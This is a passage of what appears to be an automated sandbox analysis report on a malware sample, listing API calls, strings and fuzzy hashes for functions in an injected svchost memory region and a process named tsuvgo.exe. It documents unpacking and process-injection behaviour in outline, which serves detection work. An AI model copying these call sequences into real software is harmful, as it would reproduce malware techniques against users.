Part of subcall function 026949EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000), ref: 02694A92
Part of subcall function 026949EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000,?,?,?), ref: 02694A99

ResumeThread.KERNEL32(026949A2,?,?,?), ref: 02694F51
CloseHandle.KERNEL32(026949A2,?,?,?), ref: 02694F5A

Strings

D, xrefs: 02694F02

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: 80809a8d32c6a91c2311d9e1d7837897f905d78c4120dfc6b4899e06c30a634f
Instruction ID: c8c9b9b088c2db96fdb7035386db6c433b9a99d446b4d5b7ce033731bbf39d20
Opcode Fuzzy Hash: 80809a8d32c6a91c2311d9e1d7837897f905d78c4120dfc6b4899e06c30a634f
Instruction Fuzzy Hash: A4010CB290020DBFEF419AE8DC85DFFB7BDFB48314F000825F605E6050EA319D158A65

Uniqueness

Uniqueness Score: -1.00%

Function 026927E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 026927F9
CreateProcessW.KERNEL32(00000000,026962F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02692825
ExitProcess.KERNEL32 ref: 0269282C

Strings

D, xrefs: 02692800

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: 4788a0966035cfdd9cb7465cfa1624e8d15ebf2a85eb3260bba3fec68bb42ef3
Instruction ID: 9c4ef6ca18845d7d384a9f250e6ffd7e47fbcf995d0310c4a629b0420bb199e1
Opcode Fuzzy Hash: 4788a0966035cfdd9cb7465cfa1624e8d15ebf2a85eb3260bba3fec68bb42ef3
Instruction Fuzzy Hash: C9E0E5F184074CBEE741DBF4CD85DAFB77CAB04704F001825B706D5050DA745D1C8669

Uniqueness

Uniqueness Score: -1.00%

Function 02695208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0269525E
Sleep.KERNEL32(00001388), ref: 02695271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0269528A
GetProcessHeap.KERNEL32(00000000,?), ref: 02695327
GetProcessHeap.KERNEL32(00000000,?), ref: 02695333

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: 03ebe82b0eb94ba26f440233f68ee19079a883f579017276149a61ba6e98e6ad
Instruction ID: cc7562d62b75a5e0da2b5f3b9e4800d1ff6b703f055e3e65af7daa9a97ba80d9
Opcode Fuzzy Hash: 03ebe82b0eb94ba26f440233f68ee19079a883f579017276149a61ba6e98e6ad
Instruction Fuzzy Hash: BB41D1B2504300ABCB22DFA4C888B6BB7ECEF45319F840E1DF59692290DF34D559CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02695B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02695B64

Part of subcall function 02692F1A: CryptAcquireContextW.ADVAPI32(02697658,00000000,00000000,00000001,F0000000,026962B0,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692F35
Part of subcall function 02692F1A: CryptCreateHash.ADVAPI32(02697658,00008003,00000000,00000000,?,00000000,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692F52
Part of subcall function 02692F1A: CryptHashData.ADVAPI32(?,02697658,?,00000000,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692F68
Part of subcall function 02692F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692F83
Part of subcall function 02692F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02695B88,?,00000000,?), ref: 02692FA3
Part of subcall function 02692F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692FB3
Part of subcall function 02692F1A: CryptReleaseContext.ADVAPI32(02697658,00000000,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692FC2

Part of subcall function 026944D2: wsprintfA.USER32 ref: 02694509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 02695BF4

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: d9cfe6b89e4a52887a728eae6d223e2061136736935505c0050658b0a39eb4ae
Instruction ID: b518f46adb8c775435949cba02b83de89cb3525cae8e148d1e4af55f84ea883c
Opcode Fuzzy Hash: d9cfe6b89e4a52887a728eae6d223e2061136736935505c0050658b0a39eb4ae
Instruction Fuzzy Hash: 0421EFB2454248DFDF13CFA4CC94AEEBBACEB09320F58145AF906D6206DF20D185CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02693803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,02693904,?,00000000,00000000,00000000,00000007,?,?), ref: 02693855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,02693904), ref: 0269385C

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 3dc4fa7b578fb99cb89f9519c28837ad4032f4dc5c8cc347d6c78cf3a4ac5959
Instruction ID: aea7a08a1702c3b7ef8b441dcdcd830dcf32a4223333108d24db735b600aae63
Opcode Fuzzy Hash: 3dc4fa7b578fb99cb89f9519c28837ad4032f4dc5c8cc347d6c78cf3a4ac5959
Instruction Fuzzy Hash: 8B11AC72A143418FCB318F68DA84B6AB7EDAF85614F1848ADE5D6C7344DF30E892CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0269540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0269542D
RtlAllocateHeap.NTDLL(00000000), ref: 02695434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02695496
HeapFree.KERNEL32(00000000), ref: 0269549D

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: b4a6f1283d29686d0f162b660d1f57d4b9fcc81acc80d9d41e1d569b76c4add6
Instruction ID: fbf121fd9e3f63d389c9e96d86989ae3d9df8bc2cabded42dbbc3c1cae3474b8
Opcode Fuzzy Hash: b4a6f1283d29686d0f162b660d1f57d4b9fcc81acc80d9d41e1d569b76c4add6
Instruction Fuzzy Hash: E8115C779002046BCF529EB9DC88EABB76DEB8AB11F444565FE4AD7204DE30D4468BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02694AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000), ref: 02694AD7
RtlAllocateHeap.NTDLL(00000000), ref: 02694ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 02694B0A
RtlAllocateHeap.NTDLL(00000000), ref: 02694B11

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: ea911f1d1456267b221c2600d6bbbbd225120cfdfe7ba619cb133a19ad4068b4
Instruction ID: e7129efa4e70c96a766502e77ed4c08e5afe46c57ca80362da2196d6232fa553
Opcode Fuzzy Hash: ea911f1d1456267b221c2600d6bbbbd225120cfdfe7ba619cb133a19ad4068b4
Instruction Fuzzy Hash: 22115AB5A40702ABEF629F74DC05B16B7ECAF04305F088929F686C6298EF31D455DF14

Uniqueness

Uniqueness Score: -1.00%

Function 02691496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 026914DF
HeapFree.KERNEL32(00000000), ref: 026914E6

Strings

!, xrefs: 026914A3
!, xrefs: 026914C6

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: df62b0941b16db7844c3fb75318c3287f46619e5d48e09f477d70ca894f07ec9
Instruction ID: e0cd249d0a16de51eee4c560c39012ec8d152546ce1fb50c536f03636eaa9e63
Opcode Fuzzy Hash: df62b0941b16db7844c3fb75318c3287f46619e5d48e09f477d70ca894f07ec9
Instruction Fuzzy Hash: 75F0F6726502056EFF115A74DC09BF67B8CDB0BB50F684050FD09C5380EE70D89096D0

Uniqueness

Uniqueness Score: -1.00%

Function 026925E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,02697328), ref: 026925F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02692612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02692623
GetLastError.KERNEL32 ref: 0269262D

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: e33761f4c93f12be90599a54f4497a331bb459fb059afbebcc22cb12b3998bed
Instruction ID: 37834a66490469ed5b91b030887e66b0182a2459dfeccca6049eb5dcfabf5b12
Opcode Fuzzy Hash: e33761f4c93f12be90599a54f4497a331bb459fb059afbebcc22cb12b3998bed
Instruction Fuzzy Hash: EAF090B1A44288BBEB215AB6AC4DEBFBBBCEFC5B00F10002EF806C1140EE1494158A35

Uniqueness

Uniqueness Score: -1.00%

Function 026949EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000), ref: 02694A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000,?,?,?), ref: 02694A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000), ref: 02694A92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000,?,?,?), ref: 02694A99

Part of subcall function 02694B3F: lstrcpy.KERNEL32(-00000469,?), ref: 02694C69

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: 8484d1296efaf22241084fca243db318a92a8c24804664925db635dc4c0750af
Instruction ID: 8571bfd0eeb36b9fd7b3148b684f04bfd48d66d52f15bed4f80fe02a69d1007d
Opcode Fuzzy Hash: 8484d1296efaf22241084fca243db318a92a8c24804664925db635dc4c0750af
Instruction Fuzzy Hash: 2E2108B68083559FC710DFA8D84494BBBECEB88254F04491EF589D7204DF35D9459B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0269136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 026913EC
HeapFree.KERNEL32(00000000), ref: 026913F3

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 94f27c9c4213b21640e829b960d8a293c0b9d2efadeb9f0c288d59613118496c
Instruction ID: f3de10955ed7f46537bd34f091971c59083f12a4746565625d3a64165bafc94a
Opcode Fuzzy Hash: 94f27c9c4213b21640e829b960d8a293c0b9d2efadeb9f0c288d59613118496c
Instruction Fuzzy Hash: AC117BB6D0020AAFDF01DFE58844BDFB7BCEB49251F1044A5E508E3200DF3186508BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02691404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0269146A
HeapFree.KERNEL32(00000000), ref: 02691471
GetProcessHeap.KERNEL32(00000000,?), ref: 0269147E
HeapFree.KERNEL32(00000000), ref: 02691485

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5bb8f136fde56d4dec5d5390d519370ae45fa723e3b945104bb5bb935f32dec6
Instruction ID: 8fb525eea90e23b6dc17f79ae878fca5f5d510958e83c72f6037ee8246f0cae8
Opcode Fuzzy Hash: 5bb8f136fde56d4dec5d5390d519370ae45fa723e3b945104bb5bb935f32dec6
Instruction Fuzzy Hash: 401124B1D0020AABDF019FE589447DEFBFCAF0A714F1445AAE509E3200DB7595548BE4

Uniqueness

Uniqueness Score: -1.00%

Function 02691F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02691CD5: GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02691CFD
Part of subcall function 02691CD5: RtlAllocateHeap.NTDLL(00000000), ref: 02691D04
Part of subcall function 02691CD5: lstrcpy.KERNEL32(00000000,00000000), ref: 02691D2D
Part of subcall function 02691CD5: GetProcessHeap.KERNEL32(00000000,?), ref: 02691DF6
Part of subcall function 02691CD5: HeapFree.KERNEL32(00000000), ref: 02691DFD
Part of subcall function 02691CD5: Sleep.KERNEL32(00001388), ref: 02691E08

GetProcessHeap.KERNEL32(00000000,?), ref: 02691FB4
HeapFree.KERNEL32(00000000), ref: 02691FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 02691FC3
HeapFree.KERNEL32(00000000), ref: 02691FCA

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: f71afa9f25ab8ed15d46feaa28b60e961e431ba716540438586840d45e9b3e2b
Instruction ID: 496d308e62bd98f0ce41f40a88941e4f94411933bb1fc9e1dd10d85663114ada
Opcode Fuzzy Hash: f71afa9f25ab8ed15d46feaa28b60e961e431ba716540438586840d45e9b3e2b
Instruction Fuzzy Hash: 7B01E5B1808349AFCB11DFA6D808A5BBBECFB4D214F04491EF59992200EB35E2549F96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tsuvgo.exePID: 2436, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	70.7%
Signature Coverage:	0%
Total number of Nodes:	205
Total number of Limit Nodes:	12

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

fail 2, xrefs: 0040112E
Start, xrefs: 00401167
fail 1, xrefs: 0040114E
fail 3, xrefs: 004010E9
Stop ok, xrefs: 00401180
Stop Err, xrefs: 00401187

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 005A04F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,005A0000), ref: 005A05D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,005A003A), ref: 005A060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 005A066F
VirtualFree.KERNELBASE(00630000,00000000,00008000), ref: 005A06A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,005A04CF), ref: 005A07B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,005A04CF), ref: 005A07DB

Part of subcall function 005A03A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 005A03DA

VirtualProtect.KERNELBASE(00400000,?,00000002,005A04CF), ref: 005A08A1
VirtualProtect.KERNELBASE(00400000,?,00000002,005A04CF,?), ref: 005A08F7
VirtualFree.KERNELBASE(00630000,00000000,00008000), ref: 005A091B

Memory Dump Source

Source File: 00000006.00000002.1478448077.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a0000_tsuvgo.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 9b613606ef0c92f0990e23ddef52b87e5dae40f564bcef1198d20ac0246aac43
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: A7D17E727002019FEF11EF54CC80F557BA6FF59710B590294ED0D9F6AADB70A921CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 00000006.00000002.1478325030.0000000000421000.00000040.00000001.01000000.00000006.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_421000_tsuvgo.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
